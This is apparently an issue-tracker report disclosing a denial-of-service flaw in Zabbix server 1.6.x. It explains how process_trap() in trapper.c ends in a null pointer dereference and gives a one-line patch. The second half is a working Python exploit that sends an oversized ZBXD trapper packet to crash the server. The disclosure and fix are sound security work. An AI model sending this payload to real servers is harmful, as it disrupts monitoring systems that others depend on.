-
Incident report
-
Resolution: Fixed
-
Critical
-
1.6
-
None
-
Zabbix server v1.6.x
While reading Zabbix source code, I found a small error leading to an
easy to exploit denial of service vulnerability (tested in version 1.6.1
as shipped on Ubuntu and 1.6.5 compiled from source).
In src/zabbix_server/trapper/trapper.c, function process_trap() :
- Make a truncated to 2047 copy of "s"
strscpy(copy,s);
- Check if there's some ":" in "s" (and not in "copy" !)
server=(char *)strtok(s,":");
[...]
- Look for the 1st ":" in "copy"
value_string=strchr(copy,':');
- If 1st ":" in "s" if after offset 2047
- we got a null ptr deference crash
value_string=strchr(value_string+1,':');
The patch is trivial : just use "copy" instead of "s" in your check.
server=(char *)strtok(copy,":");
Exploit code :
8<-----------------------------------------------------------------
#!/usr/bin/python
PORT = 10051
HOST = "192.168.2.89"
import socket
import struct
try:
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.settimeout(3)
socket.connect((HOST, PORT))
header = 'ZBXD\x01'
- DoS in ./src/zabbix_server/trapper/trapper.c
- If first ":" is after 2047 => DoS when reading NULL+1
data = 'A'*2050 + ':B'
size = struct.pack('q', len(data))
socket.send(header + size + data)
rcvdata = socket.recv(10240)
print rcvdata
except:
print "FAIL"
socket.close()
8<-----------------------------------------------------------------